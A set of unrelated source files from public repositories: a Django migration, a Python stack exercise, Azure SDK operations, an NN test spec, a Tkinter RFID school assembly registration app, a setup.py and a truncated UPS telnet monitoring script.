04967a4ffe67416e91dcdfacea1e59d437e7c886 | 28e7f0429e011a7be3da7fe2e1c5ee4cb0a5c4a9 | /profilepage/migrations/0009_hearts.py | 4e196d4d50dd5aeb05d8e8cc40a1ae160b7af8b9 | [] | no_license | Code-Institute-Submissions/adam181189-FriendsDiscovery_JulyResub | ff0c60e2c1d24898895984f3e308635c5b04237b | c0f21e633d84e49047b00ce5a42e9fe8b57801f5 | refs/heads/master | 2023-06-20T03:34:13.537413 | 2021-07-17T21:17:25 | 2021-07-17T21:17:25 | 388,078,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # Generated by Django 3.2.3 on 2021-05-22 21:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('profilepage', '0008_delete_friendlist'),
]
operations = [
migrations.CreateModel(
name='Hearts',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('from_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='heart_sent', to=settings.AUTH_USER_MODEL)),
('to_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='heart_received', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"adam181189@gmail.com"
] | adam181189@gmail.com |
7f3bb8b0f3ee8e09d8543a0fad022eb658cbf932 | 002bc333a1cbd4c629037d4cc0162844a29e342d | /book1/ch06/stack.py | 1a974f0deff0709865c9e38f1f0ee5f41c0dd5c1 | [
"MIT"
] | permissive | dragancvetic/py_training | 4c23a15e53852b2ce0eb48619757b1fe94648d67 | f27fa021e630fa16882a0438e009a73e11d9515b | refs/heads/master | 2016-08-05T11:06:21.816033 | 2015-08-23T20:57:57 | 2015-08-23T20:57:57 | 41,202,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | #!/usr/bin/env python
'''
An example of using list as a text stack
'''
stack=[]
def pushit():
stack.append(raw_input('Enter new string: ').strip())
def popit():
if len(stack) == 0:
print "There is nothing in stack"
else:
stack.pop()
print 'Removed [', 'stack.pop()', ']'
def viewstack():
print stack
CMDs = {'u': pushit, 'o': popit, 'v': viewstack}
def showmenu():
pr = """
p(u)sh
p(o)p
(v)iew
(q)uit
Enter choice: """
while True:
while True:
try:
choice = raw_input(pr).strip()[0].lower()
except (EOFError, KeyboardInterrupt, IndexError):
choice = 'q'
print 'You picked option: {0}'.format(choice)
if choice not in 'uovq':
print 'Invalid option, try again'
else:
break
if choice == 'q':
break
CMDs[choice]()
if __name__ == '__main__':
showmenu()
| [
"dragan.m.cvetic@gmail.com"
] | dragan.m.cvetic@gmail.com |
b8fe7ae8b85c3bcd71ac6f2dae28c73ba24a674b | d7016f69993570a1c55974582cda899ff70907ec | /sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2019_04_01/aio/operations/_registries_operations.py | 96c7dd2ba66633f991630f8e2ddcd4c222a39f8a | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 10,664 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Optional, TypeVar, Union
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._registries_operations import build_get_build_source_upload_url_request, build_schedule_run_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RegistriesOperations:
"""RegistriesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerregistry.v2019_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _schedule_run_initial(
self,
resource_group_name: str,
registry_name: str,
run_request: "_models.RunRequest",
**kwargs: Any
) -> Optional["_models.Run"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.Run"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2019-04-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(run_request, 'RunRequest')
request = build_schedule_run_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._schedule_run_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_schedule_run_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/scheduleRun"} # type: ignore
@distributed_trace_async
async def begin_schedule_run(
self,
resource_group_name: str,
registry_name: str,
run_request: "_models.RunRequest",
**kwargs: Any
) -> AsyncLROPoller["_models.Run"]:
"""Schedules a new run based on the request parameters and add it to the run queue.
:param resource_group_name: The name of the resource group to which the container registry
belongs.
:type resource_group_name: str
:param registry_name: The name of the container registry.
:type registry_name: str
:param run_request: The parameters of a run that needs to scheduled.
:type run_request: ~azure.mgmt.containerregistry.v2019_04_01.models.RunRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Run or the result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_04_01.models.Run]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2019-04-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._schedule_run_initial(
resource_group_name=resource_group_name,
registry_name=registry_name,
run_request=run_request,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_schedule_run.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/scheduleRun"} # type: ignore
@distributed_trace_async
async def get_build_source_upload_url(
self,
resource_group_name: str,
registry_name: str,
**kwargs: Any
) -> "_models.SourceUploadDefinition":
"""Get the upload location for the user to be able to upload the source.
:param resource_group_name: The name of the resource group to which the container registry
belongs.
:type resource_group_name: str
:param registry_name: The name of the container registry.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SourceUploadDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_04_01.models.SourceUploadDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SourceUploadDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2019-04-01") # type: str
request = build_get_build_source_upload_url_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
template_url=self.get_build_source_upload_url.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('SourceUploadDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_build_source_upload_url.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/listBuildSourceUploadUrl"} # type: ignore
| [
"noreply@github.com"
] | noreply@github.com |
7d1a9e35199da075a9e9b47dafc3b51e1f1c0ba8 | 2804432fba5a4fe639d07a207bb01f71e03d9189 | /test/cts/tool/CTSConverter/src/nn/specs/V1_2/argmax_1.mod.py | 6dc7430affa11a4f7cdba79b73c20f98a03f615b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | intel/webml-polyfill | 5685299e1b6d91a010c5e057685bf010d5646e4f | bd014955c5bcc9dc5465aea06721072f45ab4a75 | refs/heads/master | 2023-09-01T17:30:55.961667 | 2023-04-14T01:18:47 | 2023-04-14T01:18:47 | 126,892,425 | 168 | 75 | Apache-2.0 | 2023-04-14T05:16:41 | 2018-03-26T21:31:32 | Python | UTF-8 | Python | false | false | 1,025 | py | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
input0 = Input("input0", "TENSOR_FLOAT32", "{2, 2}")
axis = Int32Scalar("axis", 1)
output0 = Output("output", "TENSOR_INT32", "{2}")
model = Model().Operation("ARGMAX", input0, axis).To(output0)
quant8 = DataTypeConverter().Identify({
input0: ["TENSOR_QUANT8_ASYMM", 1.0, 0],
})
Example({
input0: [1.0, 2.0,
4.0, 3.0],
output0: [1, 0],
}).AddVariations("relaxed", "float16", "int32", quant8)
| [
"yanx.cui@intel.com"
] | yanx.cui@intel.com |
c10b64b68a73422fbdf6966007bc2b99cc7da702 | 633088a6c9f0248585b1e90d7857f57a76776906 | /aspire-assembly-app.py | 4d462da48dc35542cd63ba9b4105e0bb135aed5d | [
"Unlicense"
] | permissive | wmfgrey/assembly | 12e351b846247a55fcea692fa8b9a04898252888 | db72d2b09064447807ff37b678124e649ee704e2 | refs/heads/master | 2020-04-09T18:25:02.802949 | 2018-12-05T12:00:58 | 2018-12-05T12:00:58 | 160,511,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,524 | py |
# Aspire Assembly Registration App
# Will Grey
# 23/11/2018
import base64
import sqlite3
from tkinter import *
import datetime
import hashlib
import csv
class Db():
def __init__(self):
self.openDb()
self.db.execute("""CREATE TABLE IF NOT EXISTS students
(studentID INTEGER PRIMARY KEY,
surname TEXT,
firstname TEXT,
groupID TEXT,
year INTEGER,
rfid TEXT,
last_registration INTEGER)""")
self.closeDb()
def openDb(self):
try:
self.conn = sqlite3.connect('assembly-app.db')
self.db = self.conn.cursor()
except:
print("Cannot open or create database file")
def closeDb(self):
self.conn.commit()
self.conn.close()
class Help():
def help(self):
comment=("Take Register:\t\tRun this while register is open. \n\n"
"Create Register: \t\tThis will create an attendance_date.csv file\n"
"\t\t\twhere date is the current date.\n"
"\t\t\tFormat: surname, firstname, group, year, '/ or N'\n\n"
"Export Students: \t\tThis will export a list of students\n"
"\t\t\tinto a file called students.csv\n\n"
"Import Students: \t\tThis will import a list of students\n"
"\t\t\tinto a file called students.csv\n"
"\t\t\tThe file is in the form: \n \t\t\tsurname, firstname, group, year, rfid\n"
"\t\t\tIf RFID is unavailable enter NULL\n\n"
"Add Student: \t\tAdd students to database.\n\n"
"Remove Student: \tRemove students from database.\n"
"\t\t\tTo update a student record first remove the \n"
"\t\t\tstudent then add the student again with the\n"
"\t\t\tupdated details.\n\n"
"Update Student RFID: \tUpdate student RFID in database.\n\n"
"End of Year Update: \tRemoves all Year 13 from database\n"
"\t\t\tand updates Year 12 students to Year 13.\n"
"\t\t\tWARNING: THIS MAKES SUBSTANTIAL CHANGES\n"
"\t\t\tTO THE DATABASE THAT CANNOT BE RECOVERED\n\n"
"Help: \t\t\tDisplay this help menu\n\n"
"Exit: \t \t\tQuit application")
self.help_window = Toplevel()
self.help_window.wm_title("Help")
self.help_window.geometry("450x580")
self.help_window.resizable(False, False)
self.help_window.configure(background="white")
Label( self.help_window,text="Help", font=("Helvetica",18), background="white").pack()
Label( self.help_window, text=comment, bg="white",justify=LEFT).pack(side="top", fill="both", expand=True, padx=10, pady=10)
Button( self.help_window,text="Close",background="white",command=self.help_window.destroy).pack()
class UpdateStudents(Db):
def list_students(self):
self.openDb()
self.db.execute("SELECT surname, firstname, groupID FROM students ORDER BY surname")
all_rows = self.db.fetchall()
self.students=[]
for row in all_rows:
self.students.append(row[0] + " " + row[1] + " " + row[2])
self.closeDb()
self.update_students_win()
def update_students_win(self):
add_win = Toplevel()
add_win.wm_title("Update Students")
add_win.geometry("250x180")
add_win.resizable(False, False)
add_win.configure(background="white")
self.rfid= Entry(add_win,show="*")
self.st = StringVar(add_win)
self.st.set(self.students[0])
self.entryVal2=StringVar()
self.entryVal2.set("")
Label(add_win, text="Update Students", font=("Helvetica",16), bg="white").grid(row=1, column=1,columnspan=2)
Label(add_win, text="Student", font=("Helvetica",12), bg="white").grid(row=2,column=1)
o=OptionMenu(add_win, self.st, *self.students)
o.configure(background="white")
o.grid(row=2,column=2)
Label(add_win, text="RFID", font=("Helvetica",12), bg="white").grid(row=3,column=1)
self.rfid.grid(row=3,column=2)
Label(add_win, textvariable=self.entryVal2, bg="white").grid(row=4,column=1,columnspan=2)
Button(add_win,text="Update Student RFID",background="white",command=self.update_students_sql).grid(row=5,column=1,columnspan=2)
Button(add_win,text="Close",background="white",command=add_win.destroy).grid(row=6,column=1,columnspan=2)
def update_students_sql(self):
hashed_rfid=hashlib.md5(str(self.rfid.get()).encode('utf-8')).hexdigest()
print(self.st.get(),hashed_rfid)
a=self.st.get().split()
self.entryVal2.set("Updated RFID of "+ self.st.get())
self.openDb()
self.db.execute("UPDATE students SET rfid=? WHERE surname=? AND firstname=? AND groupID=?",(hashed_rfid,a[0],a[1],a[2]))
self.closeDb()
self.rfid.delete(0, END)
self.rfid.insert(0, "")
class ImportStudents(Db):
def import_students(self):
self.w = Toplevel()
self.w.wm_title("Import Students")
self.w.geometry("150x100")
self.w.configure(background="white")
self.w.resizable(False, False)
Label(self.w, text="Import Students", font=("Helvetica",16), bg="white").pack()
Button(self.w,text="Select CSV file",background="white",command=self.import_csv_file).pack()
Button(self.w,text="Exit",background="white",command=self.w.destroy).pack()
def import_csv_file(self):
self.csv_file=filedialog.askopenfilename()
self.read_csv_file()
self.add_records_to_db()
def read_csv_file(self):
self.l=[]
file=open(self.csv_file)
r=csv.reader(file)
self.num=0
for i in r:
self.l.append(i)
self.num=self.num+1
file.close()
# print( self.l)
def add_records_to_db(self):
print("Start Import")
self.openDb()
try:
self.db.execute("""SELECT * FROM students""")
all_rows = self.db.fetchall()
#print(self.l[10][0],self.l[10][1],self.l[10][2])
for i in range(self.num):
flag=0
for row in all_rows:
if self.l[i][0].lower() == row[1].lower() and self.l[i][1].lower() == row[2].lower() and self.l[i][2].lower()== row[3].lower():
flag=1
break
if flag==0:
if self.l[i][4]!="NULL":
self.l[i][4]=hashlib.md5(str(self.rfid.get()).encode('utf-8')).hexdigest()
self.db.execute("INSERT INTO students VALUES(NULL,?,?,?,?,?,NULL)",(self.l[i]))
else:
print(self.l[i][0],self.l[i][1], "already in database")
except:
self.closeDb()
print("Problem importing the file. This is most likely because it is not in the correct format:\n\
surname, firstname, group, year, rfid_number. \n\
If RFID number is unavailable use NULL")
else:
self.closeDb()
print("End Import")
class UpdateEndOfYear(Db):
def update_students(self):
u=( "Removes all Year 13 from database\n"
"and updates Year 12 students to Year 13\n"
"WARNING: THIS MAKES SUBSTANTIAL CHANGES\n"
"TO THE DATABASE THAT CANNOT BE RECOVERED")
self.w = Toplevel()
self.w.wm_title("Update students")
self.w.geometry("500x150")
self.w.configure(background="white")
self.w.resizable(False, False)
Label(self.w, text=u, font=("Helvetica",12), bg="white").pack()
Button(self.w,text="Update",background="white",command=self.update_db).pack()
Button(self.w,text="Exit",background="white",command=self.w.destroy).pack()
def update_db(self):
self.openDb()
self.db.execute("DELETE FROM students WHERE year=13")
self.db.execute("UPDATE students SET year=13 WHERE year=12")
self.db.execute("""SELECT * FROM students""")
all_rows = self.db.fetchall()
for row in all_rows:
old_group=row[3]
new_group=old_group.replace("L","U")
self.db.execute("UPDATE students SET groupID=? WHERE studentID=?",(new_group,row[0]))
self.closeDb()
self.w.destroy()
class ExportStudents(Db):
def get_students(self):
f=open("students.csv","w")
self.openDb()
self.db.execute("""SELECT * FROM students ORDER BY surname""")
all_rows = self.db.fetchall()
for row in all_rows:
f.write(str(row[1])+str(",")+str(row[2])+str(",")+str(row[3])+str(",")+str(row[4])+str("\n"))
f.close()
self.closeDb()
self.get_students_window()
def get_students_window(self):
s = Toplevel()
s.wm_title("Export Students")
s.geometry("350x100")
s.resizable(False, False)
s.configure(background="white")
Label(s,text="Export Students", font=("Helvetica",18), background="white").pack()
Label(s, text="List of students successfully exported into students.csv file.", bg="white", justify=LEFT).pack(side="top", fill="both", expand=True, padx=10, pady=10)
Button(s,text="Exit",background="white",command=s.destroy).pack()
class RemoveStudent(Db):
def remove_student(self):
self.openDb()
self.db.execute("SELECT surname, firstname, groupID FROM students ORDER BY surname")
all_rows = self.db.fetchall()
self.students=[]
for row in all_rows:
self.students.append(row[0] + " " + row[1] + " " + row[2])
self.closeDb()
self.remove_students_win()
def remove_students_win(self):
self.add_win = Toplevel()
self.add_win.wm_title("Update Students")
self.add_win.geometry("180x130")
self.add_win.resizable(False, False)
self.add_win.configure(background="white")
self.st = StringVar(self.add_win)
self.st.set(self.students[0])
self.entryVal=StringVar()
self.entryVal.set("")
Label(self.add_win, text="Remove Students", font=("Helvetica",16), bg="white").grid(row=1)
o=OptionMenu(self.add_win, self.st, *self.students)
o.configure(background="white")
o.grid(row=2)
Button(self.add_win,text="Remove Student",background="white",command=self.remove_students_sql).grid(row=3)
Button(self.add_win,text="Close",background="white",command=self.add_win.destroy).grid(row=4)
def remove_students_sql(self):
print("Removed Student: "+ self.st.get())
a=self.st.get().split()
self.entryVal.set("Removed Student: "+ self.st.get())
self.openDb()
self.db.execute("DELETE from students WHERE surname=? AND firstname=? AND groupID=?",(a[0],a[1],a[2]))
self.closeDb()
self.add_win.destroy()
class AddStudent(Db):
def add_student(self):
add_win = Toplevel()
add_win.wm_title("Add Student")
add_win.geometry("200x370")
add_win.resizable(False, False)
add_win.configure(background="white")
self.years=["12","13"]
self.firstname = Entry(add_win)
self.surname = Entry(add_win)
self.group = Entry(add_win)
self.rfid = Entry(add_win,show="*")
self.entryVal = StringVar(add_win)
self.year = StringVar(add_win)
Label(add_win, text="Add Student", font=("Helvetica",16), bg="white").pack()
Label(add_win, text="Firstname", font=("Helvetica",12), bg="white").pack()
self.firstname.pack()
Label(add_win, text="Surname", font=("Helvetica",12), bg="white").pack()
self.surname.pack()
Label(add_win, text="Year", font=("Helvetica",12), bg="white").pack()
o=OptionMenu(add_win, self.year, *self.years)
o.configure(background="white")
o.pack()
Label(add_win, text="Group", font=("Helvetica",12), bg="white").pack()
self.group.pack()
Label(add_win, text="RFID", font=("Helvetica",12), bg="white").pack()
self.rfid.pack()
Label(add_win, textvariable=self.entryVal, bg="white").pack()
Button(add_win,text="Add Student",background="white",command=self.add_students_sql).pack()
Button(add_win,text="Close",background="white",command=add_win.destroy).pack()
def reset_student_values(self):
self.rfid.delete(0, END)
self.rfid.insert(0, "")
self.firstname.delete(0, END)
self.firstname.insert(0, "")
self.surname.delete(0, END)
self.surname.insert(0, "")
self.group.delete(0, END)
self.group.insert(0, "")
def add_students_sql(self):
if self.surname.get() !="" and self.firstname.get() !="":
hashed_rfid=hashlib.md5(str(self.rfid.get()).encode('utf-8')).hexdigest()
print("Added student:",self.surname.get(),self.firstname.get(),self.group.get(),int(self.year.get()),hashed_rfid)
self.entryVal.set("Added: "+ self.firstname.get() + " " + self.surname.get())
self.openDb()
self.db.execute("SELECT * FROM students")
all_rows = self.db.fetchall()
flag=0
for row in all_rows:
if self.surname.get().lower() == row[1].lower() and self.firstname.get().lower() == row[2].lower() and self.group.get().lower() == row[3].lower():
flag=1
break
if flag==0:
self.db.execute("INSERT INTO students VALUES(NULL,?,?,?,?,?,NULL)"\
,(self.surname.get(),self.firstname.get(),self.group.get(),int(self.year.get()),hashed_rfid))
self.entryVal.set("Added: "+ self.firstname.get() + " " + self.surname.get())
else:
self.entryVal.set(self.surname.get(),self.firstname.get(), "already in database")
self.closeDb()
self.reset_student_values()
class Rfid(Db):
def __init__(self):
self.tag=""
self.todays_date=datetime.datetime.today().strftime("%Y%m%d")
def rfid_win(self):
self.win = Toplevel()
self.win.wm_title("Take Register")
self.win.geometry("200x200")
self.win.resizable(False, False)
self.win.configure(background="white")
Label(self.win,text="Click here\n to take register", font=("Helvetica",16), background="white").pack()
self.frame = Frame(self.win, width=200, height=100, background="white")
self.frame.bind("<Key>", self.key)
self.frame.bind("<Button-1>", self.callback)
self.frame.pack()
Button(self.win,text="Close",background="white",command=self.win.destroy).pack()
def key(self,event):
press = repr(event.char)
if ord(event.char) != 13:
self.tag +=press.strip("'")
else:
if len(self.tag) > 0:
self.hashed_rfid=hashlib.md5(str(self.tag).encode('utf-8')).hexdigest()
self.rfid_sql()
#print(self.hashed_rfid)
self.tag = ""
def callback(self,event):
self.frame.focus_set()
def rfid_sql(self):
self.openDb()
self.db.execute("UPDATE students SET last_registration=? WHERE rfid=?",(int(self.todays_date),self.hashed_rfid,))
self.db.execute("SELECT surname, firstname, groupID FROM students WHERE rfid=?",(self.hashed_rfid,))
record = self.db.fetchone()
self.closeDb()
print(record[0]+","+record[1]+","+record[2])
class GenerateRegister(Db):
def generate_register(self):
self.win = Toplevel()
self.win.wm_title("Generate Register")
self.win.geometry("200x200")
self.win.resizable(False, False)
self.win.configure(background="white")
Label(self.win,text="Generate register", font=("Helvetica",16), background="white").pack()
self.years=["Year 12","Year 13"]
self.year = StringVar(self.win)
Label(self.win, text="Year", font=("Helvetica",12), bg="white").pack()
o=OptionMenu(self.win, self.year, *self.years)
o.configure(background="white")
o.pack()
Button(self.win,text="Generate Register",background="white",command=self.generate_register_sql).pack()
def generate_register_sql(self):
print("Generate Register")
self.openDb()
self.db.execute("""SELECT MAX(last_registration) FROM students""")
last_registration_date = self.db.fetchall()
print(last_registration_date[0][0])
register="register_"+str(last_registration_date[0][0])+".csv"
f=open(register,"w")
if self.year.get()=="Year 12":
self.db.execute("SELECT * FROM students WHERE year=12 ORDER BY surname")
elif self.year.get()=="Year 13":
self.db.execute("SELECT * FROM students WHERE year=13 ORDER BY surname")
all_records = self.db.fetchall()
for record in all_records:
if record[6]==last_registration_date[0][0]:
f.write(record[1]+str(",")+record[2]+str(",")+record[3]+str(",/\n"))
else:
f.write(record[1]+str(",")+record[2]+str(",")+record[3]+str(",N\n"))
f.close()
self.closeDb()
self.win.destroy()
class Gui(Db):
def __init__(self):
self.d=ExportStudents()
self.h=Help()
self.u=UpdateEndOfYear()
self.adds=AddStudent()
self.impStudents=ImportStudents()
self.us=UpdateStudents()
self.rs=RemoveStudent()
self.rfid=Rfid()
self.gr=GenerateRegister()
self.window = Tk()
self.window.title("Assembly Registration App")
self.window.configure(background="white")
self.window.resizable(False, False)
# self.image = PhotoImage(data=self.encode64())
# self.image = self.image.subsample(3, 3)
self.label1 = Label(self.window,text="Aspire Assembly \nRegistration App", font=("Helvetica",18), background="white").grid(row=1)
# self.label2 = Label(self.window, image=self.image).grid(row=2,padx=20,pady=5)
Button(self.window, text='Take Register',background="white",command=self.rfid.rfid_win,font=("Helvetica",10),width=15,pady=5).grid(row=3)
Button(self.window, text='Export Register',background="white",command=self.gr.generate_register,font=("Helvetica",10),width=15,pady=5).grid(row=4)
Button(self.window, text='Import Students',background="white",command=self.impStudents.import_students,font=("Helvetica",10),width=15,pady=5).grid(row=5)
Button(self.window, text='Export Students',background="white",command=self.d.get_students,font=("Helvetica",10),width=15,pady=5).grid(row=6)
Button(self.window, text='Add Student',background="white",command=self.adds.add_student,font=("Helvetica",10),width=15,pady=5).grid(row=7)
Button(self.window, text='Remove Student',background="white",command=self.rs.remove_student,font=("Helvetica",10),width=15,pady=5).grid(row=8)
Button(self.window, text='Update Student RFID',background="white", command=self.us.list_students, font=("Helvetica",10),width=15,pady=5).grid(row=9)
Button(self.window, text='End of Year Update',background="white",command=self.u.update_students, font=("Helvetica",10),width=15,pady=5).grid(row=10)
Button(self.window, text='Help',background="white",command=self.h.help,font=("Helvetica",10),width=15,pady=5).grid(row=11)
Button(self.window, text='Exit',background="white",command=self.window.destroy,font=("Helvetica",10),width=15,pady=5).grid(row=12)
self.window.mainloop()
# def encode64(self):
# self.image = open('csf-logo.png', 'rb').read()
# self.image_64_encode = base64.b64encode(self.image)
# return self.image_64_encode
class App():
def __init__(self):
Db()
Gui()
if __name__ == '__main__':
App()
| [
"noreply@github.com"
] | noreply@github.com |
020359ee2e96f27dfb8106427a0cac3ff587cb41 | f7e511e0dc14d2b23d2bbc1c7023d1efd346829a | /rocon_smartthings_bridge/setup.py | aeb49db35e53c3477c0c68ca0f7000b82d8e1551 | [] | no_license | robotics-in-concert/rocon_devices | 1f6ffd0968a0cc565a1992b8423e5a497dbd3440 | 614a190cb9f531c3db83c3e3e4650e8a0971c8c1 | refs/heads/develop | 2021-01-10T21:06:25.738755 | 2015-07-28T08:29:35 | 2015-07-28T08:29:35 | 18,580,058 | 10 | 11 | null | 2018-02-19T22:24:08 | 2014-04-09T00:40:15 | Python | UTF-8 | Python | false | false | 233 | py | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup(
packages=['rocon_smartthings_bridge'],
package_dir={'': 'src'},
)
setup(**d)
| [
"jihoonlee.in@gmail.com"
] | jihoonlee.in@gmail.com |
8d929af30fecbb516a27705d9275e005f0984c4c | e9c43b9df16d171b46e9a28b0862c2ad4619b832 | /apc1000x.py | a444e29e92d4f2a11e61ce0ed6f3551a9a78e7b4 | [] | no_license | Interra-seven/Zabbix-ex | 5e4b16f38f6d6eae92d76f5e02ac227aaa3c1975 | 058c69c93c684c807ee827e1e5a6c26fdec6fa9d | refs/heads/master | 2020-03-23T09:58:32.964830 | 2019-02-12T12:01:01 | 2019-02-12T12:01:01 | 141,418,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import telnetlib
import re
import time
fin_lst = []
rgx_chg = re.compile('Battery charge[ ]+: ([0-9.]+)')
rgx_ld = re.compile('Load[ ]+: ([0-9.]+)')
rgx_vac = re.compile('Input voltage[ ]+: ([0-9.]+)')
if len(sys.argv) == 2:
tln = telnetlib.Telnet(sys.argv[1], 50 , 10)
time.sleep(3)
tln.write('\r\n')
data = (str(tln.read_until('>', 30))).split("\r\n")
tln.close()
for i in range (len(data)):
fnd_chg = rgx_chg.search(data[i])
fnd_ld = rgx_ld.search(data[i])
fnd_vac = rgx_vac.search(data[i])
if fnd_chg != None:
fin_lst.append('Battery charge: ' + str(fnd_chg.group(1)))
